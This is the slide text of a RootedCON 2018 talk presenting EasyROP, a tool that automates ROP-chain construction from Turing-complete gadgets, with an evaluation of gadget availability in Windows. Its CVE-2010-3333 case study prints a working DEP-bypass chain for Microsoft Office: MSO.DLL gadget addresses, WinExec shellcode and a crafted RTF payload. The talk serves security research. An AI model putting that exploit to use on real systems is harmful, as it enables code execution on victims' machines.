Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generation of ROP Chains using Turing-Complete Instruction Sets [rooted2018]

When ROP meets Turing: Automatic Generation of
ROP Chains using Turing-Complete Instruction Sets
Daniel Uroz, Ricardo J. Rodríguez
danieluroz@protonmail.com, rjrodriguez@unizar.es
All wrongs reversed
ZARAGOZA
DO
CENDI
DISCEN
DI
NOS
VN
IT
ANIM
VS
2009
CENTRO UNIVERSITARIO DE LA DEFENS
A
March 01, 2018
RootedCON 2018
Madrid, Spain

$whoami
Teruel existe!
Graduado en Informática (2016)
Analista de malware en Grupo
S21sec
:D
Miembro de CLS (2001)
Ph.D. en Informática (2013)
Profesor en Centro Universitario de
la Defensa, AGM (Zaragoza)
Líneas de investigación
Security-driven engineering
Análisis de malware
Seguridad RFID/NFC
Automatic Generation of ROP Chains using Turing-Complete Instruction Sets (D. Uroz, R.J. Rodríguez) March 01, 2018 2 / 41

Agenda
1 Introduction
2 EasyROP: Description of the tool
3 Executional Adversary Power in Windows OSes
4 Case Study: CVE-2010-3333
5 Related Work
6 Conclusions

Agenda
1 Introduction
5 Related Work
6 Conclusions

Introduction

Introduction
Johnson, P.; Gorton, D.; Lagerström, R. & Ekstedt, M. Time between vulnerability disclosures: A measure of software product
vulnerability.Computers & Security, 2016, 62, 278-295. doi: 10.1016/j.cose.2016.08.004

Introduction
∗Past performance is not guarantee of future results
Johnson, P.; Gorton, D.; Lagerström, R. & Ekstedt, M. Time between vulnerability disclosures: A measure of software product
vulnerability.Computers & Security, 2016, 62, 278-295. doi: 10.1016/j.cose.2016.08.004

Introduction
Software systems are large and complex
Fixed time-to-market urges developers to ﬁnish as soon as possible
Who cares of software quality? (or other attributes)
Consequence: software vulnerabilities on the rise
6 to 16 software bugs per 1,000 lines of code (approximately)

Introduction
Presence of software memory errors → control-ﬂow hijacking attacks
Legitimate control-ﬂow of the program is hijacked
Arbitrary code inserted AND executed by the adversary

Introduction
Presence of software memory errors → control-flow hijacking attacks
Legitimate control-flow of the program is hijacked
Arbitrary code inserted AND executed by the adversary
Different defense approaches
Control-flow integrity approaches (e.g., type-safe languages, stack cookies,
inline software guards)
Isolate malicious code prior execution (e.g., tainting, run-time elimination,
W⊕X)
Further reading:
van der Veen, V.; dutt Sharma, N.; Cavallaro, L. & Bos, H. Memory Errors: The Past, the Present, and the Future. Proceedings of the
15th International Symposium on Research in Attacks, Intrusions, and Defenses (RAID), Springer Berlin Heidelberg, 2012, 86-106. doi:
10.1007/978-3-642-33338-5_5

Introduction
W⊕X – Write-xor-Execute memory pages
Widely used defense mechanism against control-ﬂow hijacking attacks
Almost every current OS incorporates it natively

Introduction
Widely used defense mechanism against control-ﬂow hijacking attacks
Almost every current OS incorporates it natively
Concept: memory pages are either writable or executable, but not both
That is, the adversary may still inject code. However, execution is prevented

Introduction
Hardware support
NX-bit on AMD Athlon 64
XD-bit on Intel P4 Prescott
Software support
Linux (via PaX project); OpenBSD
Windows, since XP SP2 (aka Data
Execution Prevention, DEP)
Windows to rename every f***ing single thing

Introduction
Recap on stack-based buffer overﬂows
1 void readName(){
2 char username[256];
3 printf("Type user name: ");
4 scanf(" %s", username);
5 }
readName:
push ebp
mov ebp, esp
sub esp, 264
sub esp, 12
push OFFSET FLAT:.LC0
call printf
add esp, 16
sub esp, 8
lea eax, [ebp -264]
push eax
call __isoc99_scanf
add esp, 16
leave
ret
. . . −
%esp→
@username ← %ebp - 0x108

%ebp→ %ebp
@rtn address
. . . +

Introduction
1 void readName(){
5 }
readName:
push ebp
mov ebp, esp
sub esp, 264
sub esp, 12
call printf
add esp, 16
sub esp, 8
lea eax, [ebp -264]
push eax
call __isoc99_scanf
add esp, 16
leave
ret
What if username is > 0x108 bytes long?

Introduction
1 void readName(){
5 }
readName:
push ebp
mov ebp, esp
sub esp, 264
sub esp, 12
call printf
add esp, 16
sub esp, 8
lea eax, [ebp -264]
push eax
call __isoc99_scanf
add esp, 16
leave
ret
. . . −
%esp→
@username ← %ebp - 0x108

%ebp→ %ebp
@rtn address
(shellcode
begins)
... +
What if username is > 0x108 bytes long?
Adjacent memory to username is overwritten
Arbitrary code execution: ret pops the value from stack when function returns and set
it in %eip)!

Introduction
Defeating W⊕X protection
Control-ﬂow is redirected to the stack
W⊕X prevents execution. Roughly speaking, you’re fucked

Introduction
Wait a minute!

Introduction
Wait a minute!
IDEA
Since we can write the stack... write memory addresses that point to
ALREADY EXISTING code → Return-Oriented Programming (ROP)
Namely, to memory pages that already have execution privileges
Since they can execute, they are not detected by W⊕X protection

Introduction
Wait a minute!
IDEA
Since we can write the stack... write memory addresses that point to
ALREADY EXISTING code → Return-Oriented Programming (ROP)
Namely, to memory pages that already have execution privileges
Since they can execute, they are not detected by W⊕X protection
ROP enables an adversary to induce arbitrary execution behavior
while injecting no code (just addresses to existing code!)

Introduction
Return-Oriented-Programming attacks
ROP attacks
Hijack control-ﬂow without executing new code
Redirect control-ﬂow to chunks of code already available in the
memory space of the process
Recall x86 ISA has variable size!
ROP gadget: set of instructions that ends with retn
b8 89 41 08 c3 mov eax, 0xc3084189
89 41 08 mov [ecx+8], eax
c3 ret
. . .
esp → 0x7c37638d → xor ecx, ecx; ret
0x7c341591 → neg ecx; ret
0x7c367042 → adc eax, ebx; ret
0x7c34779f → pop ecx; ret
0x5d345e7f
0x7c347f97 → mov [ecx], eax; ret
. . .

Introduction
Adversary controls the order of execution of ROP gadgets
ROP chain: set of ROP gadgets chained by the adversary

Introduction
How to defeat W⊕X protection?
Build a ROP chain to deactivate the protection! First, set CPU registers to speciﬁc values.
Then,
Execute memprot() syscall in GNU/Linux
Execute SetDEPProcessPolicy() in Windows
. . .

Introduction
How to defeat W⊕X protection?
Build a ROP chain to deactivate the protection! First, set CPU registers to speciﬁc values.
Then,
Execute memprot() syscall in GNU/Linux
Execute SetDEPProcessPolicy() in Windows
. . .
Executional adversary power
Depends on the already existing code in the process’s memory space

Introduction
Church-Turing hypothesis
Any real world computation can be translated into an equivalent
computation involving a Turing machine

Introduction
Church-Turing hypothesis
Any real world computation can be translated into an equivalent
computation involving a Turing machine
Under this hypothesis, we can build a Turing-machine that performs
equivalent computations as the ones performed by a ROP chain

Introduction
Turing-machine operations
Load a constant into a register (lc)
Move a register to another register (move)
Load a value from memory (load)
Store a value into memory (store)
Add and subtract a value from memory (add and sub, respectively)
Perform logic operations (xor, and, or, not)
Simpliﬁcation by De Morgan’s Laws: and/or + xor/not
Perform conditional jumps (cond1, cond2)
First, transfer the value of a conditional ﬂag to a general purpose register
Then, use such a register as an offset to modify the stack pointer register

Introduction
Turing-machine operations deﬁned as ROP gadgets
xchg dst, src; push src; xor dst, dst; xor dst, dst;
ret; pop dst; ret; ret;
ret; add dst, src; neg src;
ret; ret;
sub dst, src;
ret;
Examples of Move a register to another register (move) operation

Introduction
Turing-machine operations deﬁned as ROP gadgets
xchg dst, src; push src; xor dst, dst; xor dst, dst;
ret; pop dst; ret; ret;
ret; add dst, src; neg src;
ret; ret;
sub dst, src;
ret;
Examples of Move a register to another register (move) operation
Work Hypothesis
If we ﬁnd at least a single gadget that allow to perform each of those
Turing-machine operations, we can solve any computational problem

Introduction
Goal: evaluate (easily) the executional adversary power

Introduction
Goal: evaluate (easily) the executional adversary power
Main contributions
EasyROP tool
Input: binary + ROP chain (speciﬁed as Turing operations)
Output: set of ROP gadgets to implement such a chain
Evaluation of the executional adversary power in Windows OSes
Still the predominant platform of attacks
32-bits and 64-bits versions
Example of ROP chain generation with a real vulnerability
Namely, CVE-2010-3333

Agenda
1 Introduction
5 Related Work
6 Conclusions

EasyROP: Tool Description
Analysis
Multi-platform
Automate building of ROP chains using sequences of Turing
operations
Allow extension (other architectures, user-deﬁned operations)

EasyROP: Tool Description
Analysis
Multi-platform
Automate building of ROP chains using sequences of Turing
operations
Allow extension (other architectures, user-deﬁned operations)
External tools used
Python3 + peﬁle
Capstone Disassembly Framework
Our tool is part of the Capstone’s showcases!
XML

EasyROP: Description of the tool
Features
Automate the creation of ROP chains
add(reg2, reg1)
lc(reg3)
store(reg3, reg2)

Features
Automate the creation of ROP chains
add(reg2, reg1)
lc(reg3)
store(reg3, reg2)
−→
xor ecx, ecx; ret
neg ecx; ret
adc eax, ebx; ret
pop ecx; ret
mov [ecx], eax; ret

Features
Creation of user-specified operation using XML
[src]: dirección de fuente alojada en un registro.
{eax, ebx, ecx...}: registro espec´ıfico de propósito general.
[{eax, ebx, ecx...}]: dirección alojada en un registro espec´ıfico de propósito
general.
<reg{1,2} value ="0xFFFFFFFF">: valor obligatorio del registro.
<?xml version="1.0" encoding="UTF−8"?>
<!DOCTYPE operations [
<!ELEMENT operations (operation)+>
<!ELEMENT operation (set)+>
<!ATTLIST operation
name CDATA #REQUIRED>
<!ELEMENT set (ins)+>
<!ELEMENT ins (reg1 | reg2)∗>
<!ATTLIST ins
mnemonic CDATA #REQUIRED>
<!ELEMENT reg1 (#PCDATA)>
<!ATTLIST reg1
value CDATA #IMPLIED>
<!ATTLIST reg2
]>
<operations>
<operation name="move">
<set>
<ins mnemonic="xor">
<reg1>dst</reg1>Automatic Generation of ROP Chains using Turing-Complete Instruction Sets (D. Uroz, R.J. Rodríguez) March 01, 2018 22 / 41

Features
Creation of user-specified operation using XML
[src]: dirección de fuente alojada en un registro.
{eax, ebx, ecx...}: registro espec´ıfico de propósito general.
[{eax, ebx, ecx...}]: dirección alojada en un registro espec´ıfico de propósito
general.
<reg{1,2} value ="0xFFFFFFFF">: valor obligatorio del registro.
<?xml version="1.0" encoding="UTF−8"?>
<!DOCTYPE operations [
<!ELEMENT operations (operation)+>
<!ELEMENT operation (set)+>
<!ATTLIST operation
name CDATA #REQUIRED>
<!ELEMENT set (ins)+>
<!ELEMENT ins (reg1 | reg2)∗>
<!ATTLIST ins
mnemonic CDATA #REQUIRED>
<!ATTLIST reg1
<!ATTLIST reg2
]>
<operations>
<operation name="move">
<set>
<ins mnemonic="xor">
<reg1>dst</reg1>
8 <!ELEMENT ins (reg1 | reg2)∗>
9 <!ATTLIST ins
10 mnemonic CDATA #REQU
11 <!ELEMENT reg1 (#PCDATA)>
12 <!ATTLIST reg1
13 value CDATA #IMPLIED>
14 <!ELEMENT reg2 (#PCDATA)>
15 <!ATTLIST reg2
16 value CDATA #IMPLIED>
17 ]>
18 <operations>
19 <operation name="move">
20 <set>
21 <ins mnemonic="xor">
22 <reg1>dst</reg1>
23 <reg2>dst</reg2>
24 </ins>
25 <ins mnemonic="add">
26 <reg1>dst</reg1>
27 <reg2>src</reg2>
28 </ins>
29 </set>
30 </operation>
31 </operations>
Código 3.1: Fichero XML con su DT
un conjunto.

Release notes
Released under GNU GPLv3 license, hosted on GitHub:
https://github.com/uZetta27/EasyROP
Page 1 of 1
Page 1 of 1
30/09/2016file:///C:/Users/uzett/Downloads/Octicons-mark-github.svg

Agenda
1 Introduction
5 Related Work
6 Conclusions

Executional Adversary Power in Windows OSes
Experimental test-bed
Search for all Turing-machine operations on Windows
Subset of KnownDLLs Windows object (+ ntdll.dll)
Contains most used system DLLs: advapi32.dll, comdlg32.dll, gdi32.dll,
kernel32.dll, ole32.dll, rpcrt4.dll, shell32.dll,user32.dll, wldap32.dll
ntdll.dll is part of Windows PE loader (always in memory!)
Test environment
Intel Core i7, 8GB RAM, 256 GB SSD
Oracle VirtualBox: 4GB RAM, 32GB HDD
Operating Systems (32/64 bits)
Windows XP Professional
Windows 7 Professional
Windows 8.1 Pro
Windows 10 Education

Evaluation
Version 32-bit 64-bit
Windows XP
Windows 7
Windows 8.1
Windows 10
Summary of results
shell32.dll + {ntdll.dll, kernel32.dll}: enough gadgets to
conform all Turing-machine operations

Evaluation
Version 32-bit 64-bit
Windows XP
Windows 7
Windows 8.1
Windows 10
Summary of results
shell32.dll + {ntdll.dll, kernel32.dll}: enough gadgets to
conform all Turing-machine operations
All operations but conditional jumps −→ 100 % in all OSes with just
ntdll.dll!!!
Conditional jumps are unusual operations when exploiting

Agenda
1 Introduction
5 Related Work
6 Conclusions

Case Study: CVE-2010-3333
Microsoft Office vulnerability
Affected versions: Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office
2010, Office 2004 and 2008 for Mac, and Office for Mac 2011
Disclosed in September 2010
Subsequently patched in MS10-087 (published in November 09, 2010)

Microsoft Office vulnerability
Affected versions: Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office
2010, Office 2004 and 2008 for Mac, and Office for Mac 2011
Disclosed in September 2010
Subsequently patched in MS10-087 (published in November 09, 2010)
November 2012: attack to NATO’s Special Operations Headquarters
Attack was delivered via spear phishing attaching a specially crafted Rich Text
Format (RTF) document exploiting CVE-2010-333
RTF file starts with the tag “{rtf1” and consists of unformatted text, control words,
control symbols, and groups enclosed in braces
{rtf1{
....
{shp{sp{sn pFragments}{sv value}}}
}
}

Stack-based BOF in function in charge of parsing RTF ﬁle
Example: MSO.DLL 11.0.5606
MD5 251C11444F614DE5FA47ECF7275E7BF1
Microsoft Ofﬁce 2003 suite
1 0x30f4cc5d push ebp
2 0x30f4cc5e mov ebp, esp
3 0x30f4cc60 sub esp, 0x14
4 (...)
5 0x30f4cc93 call dword [eax + 0x1c] ; calls to MSO.30e9eb62
6 0x30f4cc96 mov eax, dword [ebp + 0x14]
7 0x30f4cc99 push dword [ebp + 0x18]
8 0x30f4cc9c mov edx, dword [ebp - 0x10]
9 0x30f4cc9f neg eax
10 0x30f4cca1 sbb eax, eax
11 0x30f4cca3 lea ecx, [ebp - 8]
12 0x30f4cca6 and eax, ecx
13 0x30f4cca8 push eax
14 0x30f4cca9 push dword [ebp + 8]
15 0x30f4ccac call 0x30f4cb1d
16 0x30f4ccb1 test al, al
17 0x30f4ccb3 je 0x30f4cd51
18 (...)
19 0x30f4cd51 pop esi
20 0x30f4cd52 pop ebx
21 0x30f4cd53 pop edi
22 0x30f4cd54 leave
23 0x30f4cd55 ret 0x14
1 0x30e9eb62 push edi
2 0x30e9eb63 mov edi, dword [esp + 0xc]
3 0x30e9eb67 test edi, edi
4 0x30e9eb69 je 0x30e9eb92
5 0x30e9eb6b mov eax, dword [esp + 8]
6 0x30e9eb6f mov ecx, dword [eax + 8]
7 0x30e9eb72 and ecx, 0xffff
8 0x30e9eb78 push esi
9 0x30e9eb79 mov esi, ecx
10 0x30e9eb7b imul esi, dword [esp + 0x14]
11 0x30e9eb80 add esi, dword [eax + 0x10]
12 0x30e9eb83 mov eax, ecx
13 0x30e9eb85 shr ecx, 2
14 0x30e9eb88 rep movsd es:[edi], dword ptr [esi]
15 0x30e9eb8a mov ecx, eax
16 0x30e9eb8c and ecx, 3
17 0x30e9eb8f rep movsb es:[edi], byte ptr [esi]
18 0x30e9eb91 pop esi
19 0x30e9eb92 pop edi
20 0x30e9eb93 ret 0xc

Building the ROP chain
We only need to pass to this function a zero value ¨
Assume that the function address is known
After executing it, we can directly jump to our shellcode at the stack
We need to know the address of esp value
We could also jump to a ROP gadget containing a divert to the stack. . .

eax ????
ecx ????
edx ????
ebx 00000000
esp address3
ebp @SetProcessDEPPolicy()
esi address1
edi address1
eip ????
esp → address1 (value of edi)
address1 (value of esi)
@SetProcessDEPPolicy() (value of ebp)
address3 (value of esp)
00000000 (value of ebx)
???? (value of edx)
???? (value of ecx)
???? (value of eax)
address3 → (exploit payload)
(...)
CPU state Stack state
(before pushad) (after pushad)

nop()
lc(edi)
lc(esi)
lc(ebx)
lc(ebp)
pushad()

nop()
lc(edi)
lc(esi)
lc(ebx)
lc(ebp)
pushad()
MSO.DLL ﬁle as input
No ASLR compatible ¨
Execution parameter depth 2
∼ 72 seconds

nop()
lc(edi)
lc(esi)
lc(ebx)
lc(ebp)
pushad()
nop()
...
0x30c92448: ret
lc(edi)
...
0x30cae25c: pop edi ; ret
lc(esi)
...
0x30ca32fd: pop esi ; ret
lc(ebx)
...
0x30ca3654: pop ebx ; ret
lc(ebp)
...
0x30ca32d1: pop ebp ; ret
pushad()
...
0x30ce03b5: pushal ; ret

1 33C0 xor eax, eax
2 50 push eax
3 6863616C63 push ’calc’
4 8BC4 mov eax, esp
5 6A05 push 5
6 50 push eax
7 BFFDE53377 mov edi, kernel32.WinExec
8 FFD7 call edi
1 {rtf1{shp{sp{sn pFragments}{sv 1;4;010
2 0020000014141414141414141414141414141414141
3 4141414824c93000000000000000000000000000000
4 00000000000
5 5ce2ca30
6 4824c930
7 fd32ca30
8 4824c930
9 5436ca30
10 00000000
11 d132ca30
12 2f602e77
13 b503ce30
14 33c0506863616c638bc46a0550bffde53377ffd7}}}}

Agenda
1 Introduction
5 Related Work
6 Conclusions

Related Work
ROP and Turing theory contributions (ask us for full references)
S-CCS-07 thesis: In any sufficiently large body of x86 executable code,
there will exist sufficiently many useful code sequences that an attacker
[may] undertake [any] arbitrary computation
shell32.dll: 21MB on Windows 10 (x86-64) – fair enough ¨
M-TechReport-08 Classification of ROP gadgets, according to where you
return (ret2text, ret2bss, ret2data, ret2heap)
CDDSSW-CCS-10 No need of retn instructions
Jump-Oriented Programming (JOP): pop reg;jmp *reg
RBSS-TISS-12 Set of Turing-complete gadgets for Linux/x86 and
Solaris/SPARC
BB-SP-14 Sigreturn-Oriented Programming (SROP). Turing-complete

Related Work
Solutions against ROP attacks (ask us for full references)
Dynamic Binary Instrumentation (DBI)
ROPDefender shadow stack
DROP monitor of retn instructions (detects ROP gadgets ≤ 5 instructions)
/ROP whitelisting legitimate return addresses
ROPGuard monitoring Windows functions (CreateProcess,
VirtualProtect, VirtualAlloc, LoadLibrary)
kBouncer use of Intel LBR records
Disjoint Code Layouts (DLC) execution and replication of multiple run-time
variants of the same application under the control of a monitor
Ask us for full references, if interested

Related Work
Other ROP-related tools (ask us for full references)
Q: automatically generates ROP payloads in Linux (not Turing-complete)
Braille (Ruby): creates automatically a shellcode for a particular target
(namely, a Linux server)
Defeats ASLR + stack cookies defenses

Related Work
Other ROP-related tools (ask us for full references)
Q: automatically generates ROP payloads in Linux (not Turing-complete)
Braille (Ruby): creates automatically a shellcode for a particular target
(namely, a Linux server)
Defeats ASLR + stack cookies defenses
ROPgadget (Python): search for ROP gadgets in a given binary
Ropper: similar to ROPgadget, allows to create predeﬁned shellcodes

Agenda
1 Introduction
5 Related Work
6 Conclusions

Conclusions
EasyROP tool (https://github.com/uZetta27/EasyROP)
Automates the construction of a ROP chain speciﬁed as Turing machine operations
Allows user-deﬁned operations using XML
Existence of ROP gadgets determines the executional adversary power
Roughly speaking, what can an adversary perform using ROP attacks?
Evaluation of executional adversary power in different OSes
More in 32-bit than in 64-bit systems
Enough gadgets to conform all Turing-machine operations (shell32.dll +
{ntdll.dll, kernel32.dll})
All operations but conditional jumps (ntdll.dll)
Conditional jumps are unusual operations when exploiting

Conclusions

Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generation of ROP Chains using Turing-Complete Instruction Sets [rooted2018]

More Related Content

What's hot (20)

Similar to Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generation of ROP Chains using Turing-Complete Instruction Sets [rooted2018] (20)

More from RootedCON (20)

Recently uploaded (20)

Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generation of ROP Chains using Turing-Complete Instruction Sets [rooted2018]